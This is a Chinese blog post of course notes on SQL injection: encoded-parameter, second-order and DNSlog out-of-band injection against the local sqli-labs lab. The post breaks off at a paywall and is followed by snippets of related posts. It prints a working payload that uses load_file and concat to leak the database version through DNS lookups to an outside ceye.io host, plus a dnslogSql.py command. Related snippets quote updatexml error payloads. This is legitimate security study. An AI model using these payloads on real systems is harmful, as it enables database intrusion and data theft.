B站小迪安全笔记第十七天-SQL注入之二次加解密,dns等注入

已于 2022-07-29 17:29:44 修改
阅读量756 收藏 1
点赞数
分类专栏: 笔记 文章标签: 安全 sql web安全
于 2022-07-29 09:38:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61530426/article/details/126048937
版权

 加解密,二次,DNSlog 注入

注入原理,演示案例,实际应用(中转注入)

DNSlog:解决了盲注不能回显数据,效率低的问题

http://127.0.0.1:8080/sqlilabs/less-2/?id=-1 and if((select load_file(concat('\\\\',(select version()),'.1t7i2f.ceye.io\\abc'))),1,0)--+

启动dnslog

D:\Python27\python.exe dnslogSql.py -u "http://127.0.0.1:8080/sqlilabs/Less-9/?id=1' and ({})--+"

 

sqlilabs-less24-post登录框&二次注入

二次注入无法通过扫描工具或者代码自己手工测试出来的,二次注入一般会产生在网站程序源代码才会发现的注入漏洞,从前端或者黑盒测试是看不到这个漏洞。

二次注入原理,主要分为两步:

第一步:插入恶意数据

最低0.47元/天 解锁文章
林墨麟
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第17天:WEB漏洞-SQL注入之二次,解密,DNS注入1
08-03
WEB 漏洞-二次,解密,DNS注入#解密,二次,DNSlog 注入注入原理,演示案例,实际应用(中转注入DNSlog:解决了盲注不能回显数据,效率低
安全学习笔记--第17天:web漏洞--SQL注入之二次注入解密DNSlog注入
zr1213159840的博客
12-15 545
解密,二次,DNSlog注入 注入原理,演示案例,实际应用(中转注入解密:有些页面不会直接显示明文的信息,因此需要注入的时候,注入的语句需要先密 二次注入:二次注入是无法通过扫描或者黑盒测试来进行挖掘的。一般需要进行源码审计 DNSlog:解决盲注不能回显数据,效率低的问题 load_file和DNSlog进行结合,当load_file是能对外进行读取的,请求一个网的时候,会通过DNSlog传回相关的信息。DNSlog注入必须要有最高权限。 演示案例 sqlilabs-less21-cooki
安全第17天 web漏洞,SQL注入之二次,解密DNS注入
qq_46116117的博客
12-27 364
17 web漏洞,SQL注入之二次,解密DNS注入 解密注入 知识点 即get或者post的参数采用了base64等密方式将数据进行密,在通过参数传递给服务器 如果想要对这个网,再ID处进行注入 则需要先编写sql注入语句,然后在进行base64编码 案例:sql-libs–21 正常页面 一看就是cookie注入 抓个包看看 YWRtaW4%3D %3D为url编码的= 尝试用base64解码看看 我们可以尝试在这里进行注入注入的sql语句经过base64密之后放入cooki
《小安全》第17天 SQL注入:二次注入,解密注入,DNSlog注入
m0_56250796的博客
04-30 223
通过 concat() 函数将查询结果和api的地址进行拼接,形成一个四级域名,然后通过load_file()函数将域名进行dns解析,然后就可以在dns平台进行查看了。普通注入数据直接进入到 SQL 查询中,而二次注入则是输入数据经处理后存储,取出后,再次进入到 SQL 查询。在无法通过联合查询直接获取数据时,只能通过盲注一步步的获取数据,手工测试需要花费大量的时间,使用sqlmap等工具有很大的几率被封IP。实际情况中需要测试注入点,本题白盒测试默认已知为Cookie注入注入点为 uname。
2020小培训(第17天 WEB 漏洞-二次,解密,DNS,堆叠注入
是阿明呐的博客
08-24 1306
WEB 漏洞-二次,解密,DNS, 堆叠等注入 前言 解密,二次,DNSlog 注入,堆叠查询注入 注入原理,演示案例,实际应用(中转注入) 演示案例 sqlilabs-less21-cookie&解密注入(实际案例) 为什么要密进行注入? ​ 答:代码中对cookee进行base64_decode解码,解码之后带入数据库中。所以我们在注入语句要按照它的密方式进行密,然后再提交。 进行抓包,我们可以看到数据包中uname的值是被密的 把%3D改成=号,Decode as
渗透测试学习笔记(十七)WEB漏洞-二次,解密DNS注入
萧丶的博客
02-06 826
1. 解密注入 get或者post的参数采用了base64等密方式将数据进行密,在通过参数传递给服务器,eg:www.xxx.com/index.php?id=MQ== 密部分:MQ== 解密结果:1 案例:sqlilabs-less21 burp抓包 forward,可以看到uname=YWRtaW4%3D %3D 为 = ,base解密为admin 将uname的值改为注入语句: admin' or updatexml(1,concat(0x7e,(database())),0)
【小安全】红蓝对抗 | 网络攻防 | V2022全栈培训笔记(WEB攻防24-30 -SQL注入
qq_46343633的博客
12-08 889
二次注入-74CMS&网鼎杯2018 UnfinishCTF-I网鼎杯2018 UnfinishCMS-74CMS个人会员中心#堆叠注入数据库类型&强网杯2019随便注根据数据库类型决定是否支持多条语句执行。
【小安全】web安全|渗透测试|网络安全 | 学习笔记-4
youngerll的博客
12-30 3298
【小安全】web安全|渗透测试|网络安全 | 学习笔记-4
【小安全】完整详细笔记01-39天
热门推荐
m0_74169008的博客
06-07 2万+
凡是存在文件上传的地方均有可能存在文件上传漏洞,有文件上传就可以测试漏洞;指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。文件上传漏洞的时候看对方的代码是否写的比较完整、安全,疏忽了验证就会造成文件上传漏洞;有文件上传的功能就可以去测试;
基础渗透笔记0-24天
05-18
基础渗透笔记0-24天
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
安全笔记,详细版本
01-23
安全笔记,详细版本,巨细无比
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
2020-V6-小安全讲义和相关笔记.zip
08-24
2020.V6小安全讲义和相关笔记
[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
linux系统安全及应用
最新发布
Alone8046的博客
05-30 236
一、新的服务器到手该如何部署:1.配置IP地址,网关,dns解析,内外网。3.磁盘分区:lvm及raid。二、应用:1.不需要或者不想登录的用户设置为nologin:usermod -s nologin +用户。解锁文件:chattr -i /etc/passwd。提供了一种标准的身份认证的接口(对账号权限进行控制),可以允许管理员定制化配置各种认证方式和方法。(配置的时候一定要注意:有限放开原则,用什么给什么,不需要的不)会话管理模块:管理用户的会话,记录会话信息,注销用户的会话,远程终端连接。
Linux防火墙(以iptables为例)
Tassel_YUE的博客
05-28 927
防火墙是一种网络安全设备,用于监视和控制网络数据流量。其主要功能是在不同网络之间建立一条阻隔,对进出的数据流量进行过滤和筛选,从而保护内部网络免受未经授权的访问和恶意攻击。防火墙通过规则集合控制网络流量的通过与阻止,这些规则可以根据网络策略和需求进行配置。不正确的配置可能导致无法访问特定服务或应用程序。
适合能源企业的文档安全外发系统应该是什么样的?
文件数据安全交换
05-29 292
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。飞驰云联主要服务于集成电路半导体、先进制造、高科技、金融、政府机构等行业的中大型客户,现有客户超过500家,其中500强和上市企业150余家,覆盖终端用户超过40万,每年通过飞驰云联平台进行数据传输和保护的文件量达到4.4亿个。
安全2020v6笔记
10-05
安全2020v6笔记是一款以网络安全为主题的笔记软件。该软件在2020年进行了升级,版本为v6。 小安全2020v6笔记通过提供强大的密功能,保护用户的笔记内容不被他人访问。用户可以创建多个笔记本,并在每个笔记本中添、编辑和查看笔记。同时,用户还可以为每个笔记设置密码,进一步增笔记安全性。 该软件还提供了实时同步功能,使得用户无论使用何种设备,都能随时随地查看和编辑笔记。这样,用户可以轻松地在电脑、手机和平板电脑之间切换,方便地管理和更新自己的笔记。 小安全2020v6笔记还具有友好的用户界面和简洁明了的操作方式,使得用户能够快速上手。同时,软件还提供了多种样式和主题供用户选择,以满足不同用户的喜好和需求。 此外,该软件还具备数据备份和恢复功能,用户可以定期备份自己的笔记,确保数据不会丢失。同时,如果用户不小心删除了笔记,也可以通过软件提供的恢复功能将其找回。 总之,小安全2020v6笔记是一款功能强大、安全可靠的网络安全笔记软件。它不仅提供了密和密码功能,保护用户的笔记隐私,还具备实时同步、多设备支持和数据备份恢复等便利功能,帮助用户高效地管理和保护自己的笔记内容。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值